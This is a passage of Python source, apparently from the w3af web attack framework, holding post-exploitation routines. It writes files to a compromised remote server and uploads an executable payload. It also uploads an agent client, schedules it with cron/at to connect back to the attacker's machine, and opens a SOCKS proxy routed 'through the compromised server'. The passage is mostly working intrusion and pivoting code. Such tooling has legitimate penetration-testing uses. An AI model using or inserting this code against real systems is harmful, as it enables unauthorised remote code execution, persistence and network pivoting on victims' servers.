def write(self, remote_filename, file_content):
'''
Write a the contents of the parameter "file_content" to the "remote_filename"
file in the remote filesystem.
@param remote_filename: The filename where to write the file_content
@param file_content: The string to write in the remote file
@return: The message to show to the user.
'''
if not self._transfer_handler:
# Get the fastest transfer method
ptf = payloadTransferFactory( self.execute )
self._transfer_handler = ptf.getTransferHandler()
if not self._transfer_handler.canTransfer():
return 'Failed to transfer, the transfer handler failed.'
else:
estimatedTime = self._transfer_handler.estimateTransferTime( len(file_content) )
om.out.debug('The file transfer will take "' + str(estimatedTime) + '" seconds.')
self._transfer_handler.transfer( file_content, remote_filename )
om.out.debug('Finished file transfer.')
return 'File upload was successful.'
def _send_exe_to_server(self, exe_file):
"""
This method should be implemented according to the remote operating system. The idea here is to
send the exe_file to the remote server and save it in a file.
@param exe_file: The local path to the executable file
@return: The name of the remote file that was uploaded.
"""
om.out.debug("Called _send_exe_to_server()")
om.out.console("Wait while w3af uploads the payload to the remote server...")
ptf = payloadTransferFactory(self._exec_method)
# Now we get the transfer handler
wait_time_for_extrusion_scan = ptf.estimateTransferTime()
transferHandler = ptf.getTransferHandler()
if not transferHandler.canTransfer():
raise w3afException("Can't transfer the file to remote host, canTransfer() returned False.")
else:
om.out.debug("The transferHandler can upload files to the remote end.")
estimatedTime = transferHandler.estimateTransferTime(len(exe_file))
om.out.debug('The payload transfer will take "' + str(estimatedTime) + '" seconds.')
self._remote_filename = getRemoteTempFile(self._exec_method)
om.out.debug('Starting payload upload, remote filename is: "' + self._remote_filename + '".')
if transferHandler.transfer(file(exe_file).read(), self._remote_filename):
om.out.console('Finished payload upload to "%s"' % self._remote_filename)
return self._remote_filename
else:
raise w3afException("The payload upload failed, remote md5sum is different.")
def run( self ):
'''
Entry point for the whole process.
'''
# First, I have to check if I have a good w3afAgentClient to send to the
# other end...
try:
interpreter, client_code, extension = self._select_client()
except w3afException:
om.out.error('Failed to find a suitable w3afAgentClient for the remote server.')
else:
#
# Get a port to use. Extrusion scan or any other method is applied here.
#
inbound_port = self._getinbound_port()
#
# Start the w3afAgentServer on this machine
#
agent_server = w3afAgentServer( self._ip_address, socks_port=self._socks_port, listen_port=inbound_port )
self._agent_server = agent_server
agent_server.start2()
# Wait for it to start.
time.sleep(0.5)
if not agent_server.isRunning():
om.out.error( agent_server.getError() )
else:
#
# Now that everything is setup here, transfer the client
# to the remote end and run it.
#
ptf = payloadTransferFactory( self._exec_method )
transferHandler = ptf.getTransferHandler( inbound_port )
if not transferHandler.canTransfer():
raise w3afException('Can\'t transfer w3afAgent client to remote host, canTransfer() returned False.')
else:
# Let the user know how much time it will take to transfer the file
estimatedTime = transferHandler.estimateTransferTime( len(client_code) )
om.out.debug('The w3afAgent client transfer will take "' + str(estimatedTime) + '" seconds.')
filename = getRemoteTempFile( self._exec_method )
filename += '.' + extension
# Upload the file and check integrity
om.out.console('Starting w3afAgent client upload, remote filename is: "%s" ...' % filename)
upload_success = transferHandler.transfer( client_code, filename )
if not upload_success:
raise w3afException('The w3afAgent client failed to upload. Remote file hash does NOT match.')
om.out.console('Finished w3afAgent client upload!')
# And now start the w3afAgentClient on the remote server using cron / at
self._delayedExecution( interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str( inbound_port ) )
#
# This checks if the remote server connected back to the agent_server
#
if not agent_server.isWorking():
om.out.console('Something went wrong, the w3afAgent client failed to connect back.')
else:
msg = 'A SOCKS proxy is listening on %s:%s' % (self._ip_address,self._socks_port)
msg += ' , all connections made through this daemon will be routed '
msg += ' through the compromised server. We recommend using the proxychains tool '
msg += ' ("apt-get install proxychains") to route connections through the proxy, the '
msg += ' proxy configuration should look like "socks4 %s %s"' % (self._ip_address, self._socks_port)
om.out.console( msg )
